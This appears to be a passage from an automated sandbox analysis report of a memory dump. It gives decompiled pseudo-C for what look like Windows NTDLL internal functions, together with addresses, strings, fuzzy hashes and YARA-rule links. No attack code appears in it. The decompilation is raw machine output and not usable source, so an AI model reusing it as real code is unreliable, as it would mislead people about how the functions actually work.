0x046c06d6
0x00000000

Strings

`, xrefs: 046C0633

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 17d1790a62b6fd7b5996cac992ffe8f4a3d717f5705ace43126f1691252d5086
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 7F31F332700345ABE720DEA5CC85FA777D9EB84758F04422DF998EB280E670F904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04673884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04673884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04639650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04614620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04639650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x04673893
0x04673896
0x04673899
0x0467389f
0x046738a0
0x046738a4
0x046738a9
0x046738ac
0x046738ad
0x046738ae
0x046738af
0x046738b1
0x046738b4
0x046738bb
0x046738bc
0x046738bd
0x046738c4
0x046738c8
0x046738ca
0x046738ca
0x046738d5
0x0467393e
0x04673940
0x04673942
0x04673952
0x04673954
0x04673961
0x04673961
0x04673967
0x0467396e
0x0467396e
0x04673947
0x0467394c
0x00000000
0x0467394c
0x046738ea
0x046738ee
0x046738f8
0x046738f9
0x046738ff
0x04673900
0x04673902
0x04673903
0x0467390b
0x0467390f
0x04673950
0x00000000
0x04673950
0x04673915
0x0467391d
0x0467391d
0x04673922
0x04673926
0x00000000
0x04673928
0x0467392b
0x0467392b
0x04673935
0x04673937
0x04673937
0x00000000
0x04673935
0x04673926
0x046738f0
0x00000000

Strings

BinaryName, xrefs: 046738B4

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: fcd149134240cf97beab2f9ae8a0fc7068da6eeee6e7047a1d683760b30d785d
Instruction ID: fc3c6945e5bb8b4fca6d8899f228d2e1bae3c6624a2e04b533cecbff0f427ec5
Opcode Fuzzy Hash: fcd149134240cf97beab2f9ae8a0fc7068da6eeee6e7047a1d683760b30d785d
Instruction Fuzzy Hash: 44310572A01509AFEB25DA58C945D6BB774EB40720F014169ED14A7791F730BE80EBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0462D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0462D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x46ed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04614120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0463B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E046398D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E046395D0();
					L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0462d29c
0x0462d2a6
0x0462d2b1
0x0462d2b5
0x0462d2b6
0x0462d2bc
0x0462d2bd
0x0462d2be
0x0462d2bf
0x0462d2c2
0x0462d2c4
0x0462d2cc
0x0462d384
0x0462d34b
0x0462d34f
0x0462d350
0x0462d351
0x0462d35c
0x0462d35c
0x0462d2d6
0x0462d2da
0x0462d2e1
0x0462d361
0x0462d369
0x0462d36d
0x0462d2e3
0x0462d2e3
0x0462d2e3
0x0462d2e5
0x0462d2ed
0x0462d2f5
0x0462d2fa
0x0462d302
0x0462d303
0x0462d30b
0x0462d30f
0x0462d313
0x0462d318
0x0462d31c
0x0462d320
0x0462d379
0x0462d37d
0x00000000
0x00000000
0x0466affe
0x0466b001
0x0466b011
0x00000000
0x0462d322
0x0462d322
0x0462d330
0x0462d337
0x0462d35d
0x0462d339
0x0462d33f
0x0462d38c
0x0462d38c
0x0462d33f
0x0462d349
0x00000000
0x0462d349

Strings

@, xrefs: 0462D303

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8f48a0efc0187bfb8c5e0ea998a17dfea410bcbb195590844b16b1f1a432f34a
Instruction ID: 54d227a443b7a331b0e51d60bfb258d324a8ca90f18ee90ca5f0528e124e4228
Opcode Fuzzy Hash: 8f48a0efc0187bfb8c5e0ea998a17dfea410bcbb195590844b16b1f1a432f34a
Instruction Fuzzy Hash: 65318DB1608755AFD311DF28CA8096BBBE8EB86754F00092EF99483210F639ED05CF92

Uniqueness

Uniqueness Score: -1.00%

Function 04601B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04601B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0463BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0463A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0463A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04614620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x04601b8f
0x04601b9a
0x04601b9c
0x04601b9e
0x04601ba3
0x04657010
0x04657010
0x00000000
0x04601ba9
0x04601ba9
0x04601bae
0x00000000
0x04601bc5
0x04601bca
0x04601bcf
0x04601bd0
0x04601bd1
0x04601bd2
0x04601bd6
0x04601bdc
0x04601be0
0x04656ffc
0x04657000
0x00000000
0x04657006
0x04657009
0x04657009
0x04601be6
0x04601bec
0x04601c0b
0x04601c0b
0x04601c0c
0x04601c11
0x04601c12
0x04601c15
0x04601c1b
0x04601c1f
0x04601c31
0x04601c33
0x04657026
0x04657026
0x04601c21
0x04601c24
0x04601c24
0x04601bee
0x04601bee
0x04601bf2
0x04601c3a
0x04601bf4
0x04601bf4
0x04601c05
0x04601c05
0x04601c09
0x04601c3e
0x00000000
0x00000000
0x00000000
0x04601c09
0x04601bec
0x04601be0
0x04601bae
0x04601c2e

Strings

WindowsExcludedProcs, xrefs: 04601BC5

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 52bb9ca7c0d49186f092578ea853f2941aa8a959a18ef187988ddf3aaf8162c1
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 09213AB6600228ABDB269E95C840F9BB7ADEF52715F058025FD049B350FA35FC01D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0461F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0461F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0461f71d
0x0461f722
0x0461f726
0x04664770
0x0461f765
0x0461f769
0x0461f769
0x0461f732
0x0466477a
0x00000000
0x0466477a
0x0461f738
0x0461f73a
0x0461f73c
0x0461f73f
0x0461f746
0x0461f778
0x0461f7a9
0x0461f7a9
0x0461f754
0x0461f75a
0x0461f75d
0x0461f75f
0x0461f761
0x0461f76f
0x0461f771
0x0461f771
0x0461f76f
0x0461f763
0x00000000
0x0461f763
0x0461f77d
0x0461f7a3
0x0461f7a5
0x00000000
0x0461f7a5
0x0461f77f
0x0461f782
0x0461f784
0x0461f786
0x00000000
0x00000000
0x00000000
0x0461f788
0x0461f748
0x0461f74d
0x0461f78d
0x0461f793
0x0461f7b7
0x0461f7bc
0x00000000
0x0461f7bc
0x0461f798
0x00000000
0x00000000
0x0461f79d
0x0461f7b0
0x00000000
0x0461f7b0
0x0461f79f
0x00000000
0x0461f74f
0x0461f74f
0x00000000
0x0461f74f

Strings

Actx , xrefs: 0461F73F

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 1394e386687d27f5304593b44a34186867e4c54e1ba881e392b3b2fae81f5d23
Instruction ID: 05b92e036860ddc2ad9deb420a332b39b3b605ddd213f8ebfa742485ceba94a3
Opcode Fuzzy Hash: 1394e386687d27f5304593b44a34186867e4c54e1ba881e392b3b2fae81f5d23
Instruction Fuzzy Hash: 8711B6357046428BE72C4E1DA49073672D6EBA5724F2C452AE466CB3B1FB70F8429340

Uniqueness

Uniqueness Score: -1.00%

Function 046A8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E046A8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x46d0d50);
				E0464D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04685720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0464DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0464DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0464D130(_t34, _t39, _t40);
			}

0x046a8df1
0x046a8df1
0x046a8df1
0x046a8df1
0x046a8df1
0x046a8df1
0x046a8df3
0x046a8df8
0x046a8dfd
0x046a8e00
0x046a8e0e
0x046a8e2a
0x046a8e36
0x046a8e38
0x046a8e3c
0x046a8e46
0x046a8e46
0x046a8e36
0x046a8e50
0x046a8e56
0x046a8e59
0x046a8e5c
0x046a8e60
0x046a8e67
0x046a8e6d
0x046a8e73
0x046a8e74
0x046a8eb1
0x046a8ebd

Strings

Critical error detected %lx, xrefs: 046A8E21

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 1b3743cee0015c8642cbe0c15cefdcf4ed0563e51bc2b68e11792d5f1def4fa4
Instruction ID: 825c0a56c6353fc005e44e75f4246b077258b3c08bf04d27ae73e15471cc6664
Opcode Fuzzy Hash: 1b3743cee0015c8642cbe0c15cefdcf4ed0563e51bc2b68e11792d5f1def4fa4
Instruction Fuzzy Hash: B411AD71E00748EBEF24DFA485057DCBBB0BB44314F20425ED529AB382E3342A02CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0468FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0468FF60

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: ee7abae44d92697238efa586154292d0eea7d64eb070ef1d462156a4b8150918
Instruction ID: 21f1e39332b2b40639bf6cc161689198a4c8e6b945ee65516f9eeb9e58bcbfc4
Opcode Fuzzy Hash: ee7abae44d92697238efa586154292d0eea7d64eb070ef1d462156a4b8150918
Instruction Fuzzy Hash: B911ED71A10144EFEF26EF50C948F98B7B2FB08B08F148158F5096B6A2E739B940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 046C5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E046C5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x46d1178);
				E0464D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E046C4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0463D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E046C5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x46e60e8;
								if( *0x46e60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x46e60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04639710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04636DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
